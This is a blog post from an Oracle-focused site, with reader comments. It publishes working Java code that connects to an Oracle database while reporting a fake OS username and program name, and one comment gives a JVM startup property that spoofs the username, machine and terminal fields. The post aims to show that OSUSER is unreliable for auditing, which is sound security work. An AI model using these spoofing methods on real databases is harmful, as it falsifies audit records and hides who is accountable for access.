ORAganism

Spoofing V$SESSION.OSUSER java code

Posted in Oracle by Pawel Krol on June 5, 2010

In my previous post I discussed using OSUSER for auditing user access. To spoof OSUSER I wrote a short program in Java, but I didn’t publish a source code. I was planning to do it for quite some time now, especially that Pete Finnigan expressed interest in seeing it. Martin also hassled me for the past few months, and here is the Java code I used.

To compile it I used java 1.6 and Oracle jdbc 11.2.0.1 driver:

javac -cp ../lib/ojdbc6.jar:. OraAccess.java

OraAccess.java source file

import java.util.Properties;
import java.sql.*;
import java.io.Console;
import java.io.IOException;


public class OraAccess{
   public static Connection getConnection(String db_address, String db_name, String db_username,
   String db_pass, String new_osuser){
   Properties props = new Properties();
   props.put("user", db_username);
   props.put("password", db_pass);
   props.put("v$session.osuser", new_osuser);
   props.put("v$session.program", "UserSpoofTest");
   Connection con = null;
   try {
          con = DriverManager.getConnection("jdbc:oracle:thin:@"+ db_address +":" + db_name +"",props);
       } catch(SQLException ex) {
          System.err.println("SQLException: " + ex.getMessage());
       }
   return con;
 }

public static void main(String[] args) throws SQLException, IOException {
   Console c = System.console();
   if (c == null) {
      System.err.println("No console.");
      System.exit(1);
   }
   String username;
   username = System.getProperty("user.name");

   System.out.print("Your current operating system username is: ");
   System.out.println(username);

   String database_address = c.readLine("Enter database server IP and port number (IP:port):  ");
   String database_name = c.readLine("Enter database name:  ");

   String db_username = c.readLine("Enter database username:  ");
   String db_password = c.readLine("Enter password for user \"" + db_username +"\":  ");

   String fake_osuser = c.readLine("Enter fake osuser name:  ");

   Connection conn = getConnection(database_address, database_name, db_username, db_password, fake_osuser);
   String end_connection = c.readLine("Enter something to disconnect.");
   conn.close();
  }
}

Tagged with: , , ,

7 comments

7 Responses

Subscribe to comments with RSS.

  1. Timur Akhmadeev said, on June 6, 2010 at 8:11 am

    Hi Pawel,

    with 11.2.0.1 JDBC driver you don’t even have to change Java code to spoof OS user name. You can supply it via start up property: -Doracle.jdbc.v$session.osuser=.
    Want to spoof machine/terminal? No problem at all: oracle.jdbc.v$session.machine, oracle.jdbc.v$session.terminal.

    Reply
    • Pawel Krol said, on June 6, 2010 at 11:03 am

      Hi Timur,

      thanks for your comment.
      it definitely proves that there is even easier method to spoof connection properties that the one I used.

      Reply
  2. akash said, on August 16, 2010 at 8:22 am

    A rather dumb question, where does the client at my side gets this OSUSER information? For example, I am using “Oracle SQL Developer” at my Windows PC to connect to the server. My understanding is – this client software at my end feeds this OSUSER information to the server while connecting. But Where does SQL Developer get my user name from? Can’t I change it at that point?

    Reply
    • Pawel Krol said, on August 22, 2010 at 2:16 pm

      Hi Akash,

      You are right, it’s the client software that feeds OSUSER (or other properties) to the server, and this is exactly what my code does. I don’t know if SQL developer allows you do change OSUSER field. You could try to use method suggested by Timur as SQL Developer is written in Java

      many thanks
      pawel

      Reply
  3. eterpani said, on June 25, 2011 at 4:50 pm

    Hi Pavel,
    I am not java expert but I believe that all this information is relevant for tns connections.
    If we connect localy (without using listener // jdbc:thin is going to listener port as far as I am aware) I could not imagine how we can fake os_user.
    What is your opinion?

    Reply
    • Pawel Krol said, on June 27, 2011 at 8:56 pm

      Hi Eterpani,

      I’m also not a Java expert or even a developer for that matter, but I can’t see any reason why you shouldn’t be able to fake os_user during local connection (when you connect using IPC protocol).
      Even if you connect locally you still connect via Oracle Net but use IPC protocol instead of TCP, and your connection doesn’t go via a listener. With TCP connections OS_USER seems to be a connection variable provided by a client software, and as far as I can tell, not used for any kind of authentication or verification (but I can be wrong about that). It would make sense to implement IPC connections in a similar way to TCP, that OS_USER is just a variable provided by client software.
      I can’t say that it’s definitely possible to fake OS_USER with local connections but I will try to do some research and if I find something I will let you know.

      Reply
  4. jmk said, on April 24, 2012 at 6:40 pm

    No console in your code please..Any help?????????/

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 264 other followers